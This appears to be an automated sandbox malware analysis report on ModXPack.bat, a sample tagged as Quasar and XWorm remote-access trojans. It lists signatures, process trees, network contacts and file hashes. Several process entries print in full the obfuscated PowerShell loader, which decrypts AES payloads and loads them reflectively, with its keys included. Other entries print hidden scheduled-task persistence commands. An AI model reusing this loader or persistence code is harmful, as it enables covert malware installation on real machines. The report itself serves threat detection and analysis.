Malware Analysis Report

2024-10-23 21:29

Sample ID 240413-y169pshc96
Target ModXPack.bat
SHA256 e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d
Tags
quasar xworm office04 rat spyware trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral3
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d

Threat Level: Known bad

The file ModXPack.bat was found to be: Known bad.

Malicious Activity Summary

quasar xworm office04 rat spyware trojan

Detect Xworm Payload

Quasar payload

Quasar RAT

Xworm

Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-13 20:16

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-13 20:16

Reported

2024-04-13 20:17

Platform

win10v2004-20240412-en

Max time kernel

42s

Max time network

61s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3124 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3124 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 4084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 4084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 2032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe
PID 2228 wrote to memory of 2032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe
PID 2032 wrote to memory of 1468 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 2032 wrote to memory of 1468 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 4068 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1468 wrote to memory of 4068 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4068 wrote to memory of 3792 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 4068 wrote to memory of 3792 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 3792 wrote to memory of 2380 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3792 wrote to memory of 2380 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 3456 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 3456 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2272 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe
PID 2380 wrote to memory of 2272 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe
PID 2272 wrote to memory of 4420 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 2272 wrote to memory of 4420 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 4420 wrote to memory of 3076 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4420 wrote to memory of 3076 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModXPack.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModXPack.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_600_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_600.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_600.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_600.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_600.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_600.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ModPack.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_38_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_38.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_38.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_38.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_38.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_38.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 china-earth.gl.at.ply.gg udp
US 147.185.221.19:14568 china-earth.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 notes-creation.gl.at.ply.gg udp
US 147.185.221.19:27030 notes-creation.gl.at.ply.gg tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:443 ipwho.is tcp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xjuxgqbs.m2f.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2228-9-0x00000221D1600000-0x00000221D1622000-memory.dmp

memory/2228-10-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/2228-11-0x00000221E9820000-0x00000221E9830000-memory.dmp

memory/2228-12-0x00000221E9820000-0x00000221E9830000-memory.dmp

memory/2228-13-0x00000221CF940000-0x00000221CF948000-memory.dmp

memory/2228-14-0x00000221EBC90000-0x00000221EBE32000-memory.dmp

memory/4084-16-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/4084-27-0x000001B67C8E0000-0x000001B67C8F0000-memory.dmp

memory/4084-26-0x000001B67C8E0000-0x000001B67C8F0000-memory.dmp

memory/4084-28-0x000001B67C8E0000-0x000001B67C8F0000-memory.dmp

memory/4084-31-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f8d49a4af7a844bfc7247d5670def557
SHA1 26ae0ce194a77a7a1887cf93741293fdfa6c94c4
SHA256 61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b
SHA512 9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\startup_str_600.vbs

MD5 8d99f4924ef95453687c157e804c9b60
SHA1 5c1033f40b2ff5b82bcd7f3b7327aca73f8c05fb
SHA256 9c06a5186719d628bd78ca5bf2adb5adf6687f45080be5a453b2466eb0eba7f5
SHA512 7e22fa19c08be6f6233d10b338416da20c9f39b8037799930b272b27346a7f58573e55b0bc5b70211c1de4d076128ea97af36e86b6d81f825b71957c9c655a50

C:\Users\Admin\AppData\Roaming\startup_str_600.bat

MD5 51d7b8be303abf43851e767d9250887b
SHA1 e795e381647c8a99529f87810347881b6b9bdeba
SHA256 e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d
SHA512 1ee6999e72bafb69559c1dbeb6ff84e46f94fe1b51a82626d7feabce5619053299872d680520aac791e103a3fb45a6d002180cc166215c59517e6c72dae6ee26

memory/4068-40-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/4068-41-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp

memory/4068-42-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp

memory/2228-53-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/4068-56-0x00000204C74C0000-0x00000204C74CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ModPack.bat

MD5 105f33324f5807a250699b78a8972954
SHA1 c7e43ef81256e582a290a84a387a2163e35de9fb
SHA256 636bf2c51b857661bf1125085ee11bc28cf2d8f2cdaa5d44135dd8d87a52a4b5
SHA512 162dabf9630be54a2c6775d9f928be6923462b211d9072752341bcdaeae8099b0d49b6710bedd13f894cc72742336728365b44e8f282622487d11fcc9cdc7101

memory/2380-65-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/2380-71-0x0000021E33DA0000-0x0000021E33DB0000-memory.dmp

memory/2380-70-0x0000021E33DA0000-0x0000021E33DB0000-memory.dmp

memory/2380-72-0x0000021E33D90000-0x0000021E33D98000-memory.dmp

memory/2380-73-0x0000021E4E0F0000-0x0000021E4E222000-memory.dmp

memory/3456-75-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/3456-86-0x000001806A150000-0x000001806A160000-memory.dmp

memory/3456-85-0x000001806A150000-0x000001806A160000-memory.dmp

memory/3456-87-0x000001806A150000-0x000001806A160000-memory.dmp

memory/3456-89-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 829eca69e3018062c625f2569858bebc
SHA1 d02dc553306bd3b29fa4fb1b789e3d07f251accf
SHA256 4a6b44ff19a84564fb03e21ed4b088df5a5b969843b47cb36853f33e9ebf8287
SHA512 6317f8090385e8cf95f070df12e663210be450dbcbf98f5c7b6bd411750b2876a33386c63497f62916a59804d6ab86bc2420c64cf5806cc1ade9613f44091009

C:\Users\Admin\AppData\Roaming\startup_str_38.vbs

MD5 37dd910af3853eec893618d5ac68fc09
SHA1 44663de84c4e2ea3502e07a4925b03d6f75262f1
SHA256 134fa00d82f1a1edbfd6027b8cb910ba6f71ad91302295fd14dac226e7a6eb4f
